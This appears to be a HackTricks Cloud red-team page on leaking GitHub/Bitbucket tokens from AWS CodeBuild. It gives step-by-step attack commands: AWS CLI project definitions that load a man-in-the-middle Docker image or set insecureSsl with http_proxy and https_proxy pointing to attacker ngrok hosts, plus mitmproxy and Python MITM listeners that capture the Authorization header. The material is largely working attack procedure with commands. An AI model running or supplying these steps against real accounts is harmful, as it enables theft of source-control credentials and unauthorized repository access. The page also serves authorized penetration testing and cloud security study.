# AWS Codebuild - Token Leakage {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %} ## Recover Github/Bitbucket Configured Tokens First, check if there are any source credentials configured that you could leak: ```bash aws codebuild list-source-credentials ``` ### Via Docker Image If you find that authentication to for example Github is set in the account, you can **exfiltrate** that **access** (**GH token or OAuth token**) by making Codebuild to **use an specific docker image** to run the build of the project. For this purpose you could **create a new Codebuild project** or change the **environment** of an existing one to set the **Docker image**. The Docker image you could use is [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm). This is a very basic Docker image that will set the **env variables `https_proxy`**, **`http_proxy`** and **`SSL_CERT_FILE`**. This will allow you to intercept most of the traffic of the host indicated in **`https_proxy`** and **`http_proxy`** and trusting the SSL CERT indicated in **`SSL_CERT_FILE`**. 1. **Create & Upload your own Docker MitM image** * Follow the instructions of the repo to set your proxy IP address and set your SSL cert and **build the docker image**. * **DO NOT SET `http_proxy`** to not intercept requests to the metadata endpoint. * You could use **`ngrok`** like `ngrok tcp 4444` lo set the proxy to your host * Once you have the Docker image built, **upload it to a public repo** (Dockerhub, ECR...) 2. **Set the environment** * Create a **new Codebuild project** or **modify** the environment of an existing one. * Set the project to use the **previously generated Docker image**
3. **Set the MitM proxy in your host** * As indicated in the **Github repo** you could use something like: ```bash mitmproxy --listen-port 4444 --allow-hosts "github.com" ``` {% hint style="success" %} The **mitmproxy version used was 9.0.1**, it was reported that with version 10 this might not work. {% endhint %} 4. **Run the build & capture the credentials** * You can see the token in the **Authorization** header:
This could also be done from the aws cli with something like {% code overflow="wrap" %} ```bash # Create project using a Github connection aws codebuild create-project --cli-input-json file:///tmp/buildspec.json ## With /tmp/buildspec.json { "name": "my-demo-project", "source": { "type": "GITHUB", "location": "https://github.com/uname/repo", "buildspec": "buildspec.yml" }, "artifacts": { "type": "NO_ARTIFACTS" }, "environment": { "type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM "image": "docker.io/carlospolop/docker-mitm:v12", "computeType": "BUILD_GENERAL1_SMALL", "imagePullCredentialsType": "CODEBUILD" } } ## Json # Start the build aws codebuild start-build --project-name my-project2 ``` {% endcode %} ### Via insecureSSL **Codebuild** projects have a setting called **`insecureSsl`** that is hidden in the web you can only change it from the API.\ Enabling this, allows to Codebuild to connect to the repository **without checking the certificate** offered by the platform. * First you need to enumerate the current configuration with something like: ```bash aws codebuild batch-get-projects --name ``` * Then, with the gathered info you can update the project setting **`insecureSsl`** to **`True`**. The following is an example of my updating a project, notice the **`insecureSsl=True`** at the end (this is the only thing you need to change from the gathered configuration). * Moreover, add also the env variables **http\_proxy** and **https\_proxy** pointing to your tcp ngrok like: {% code overflow="wrap" %} ```bash aws codebuild update-project --name \ --source '{ "type": "GITHUB", "location": "https://github.com/carlospolop/404checker", "gitCloneDepth": 1, "gitSubmodulesConfig": { "fetchSubmodules": false }, "buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - echo \"sad\"\n", "auth": { "type": "CODECONNECTIONS", "resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be" }, "reportBuildStatus": false, "insecureSsl": true }' \ --environment '{ "type": "LINUX_CONTAINER", "image": "aws/codebuild/standard:5.0", "computeType": "BUILD_GENERAL1_SMALL", "environmentVariables": [ { "name": "http_proxy", "value": "http://2.tcp.eu.ngrok.io:15027" }, { "name": "https_proxy", "value": "http://2.tcp.eu.ngrok.io:15027" } ] }' ``` {% endcode %} * Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http\_proxy and https\_proxy) ```python from mitm import MITM, protocol, middleware, crypto mitm = MITM( host="127.0.0.1", port=4444, protocols=[protocol.HTTP], middlewares=[middleware.Log], # middleware.HTTPLog used for the example below. certificate_authority = crypto.CertificateAuthority() ) mitm.run() ``` * Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port:
### ~~Via HTTP protocol~~ {% hint style="success" %} **This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can't abuse it anymore :)** {% endhint %} An attacker with **elevated permissions in over a CodeBuild could leak the Github/Bitbucket token** configured or if permissions was configured via OAuth, the **temporary OAuth token used to access the code**. * An attacker could add the environment variables **http\_proxy** and **https\_proxy** to the CodeBuild project pointing to his machine (for example `http://5.tcp.eu.ngrok.io:14972`).
* Then, change the URL of the github repo to use HTTP instead of HTTPS, for example: `http://github.com/carlospolop-forks/TestActions` * Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http\_proxy and https\_proxy) ```python from mitm import MITM, protocol, middleware, crypto mitm = MITM( host="127.0.0.1", port=4444, protocols=[protocol.HTTP], middlewares=[middleware.Log], # middleware.HTTPLog used for the example below. certificate_authority = crypto.CertificateAuthority() ) mitm.run() ``` * Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port:
{% hint style="warning" %} Now an attacker will be able to use the token from his machine, list all the privileges it has and (ab)use easier than using the CodeBuild service directly. {% endhint %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}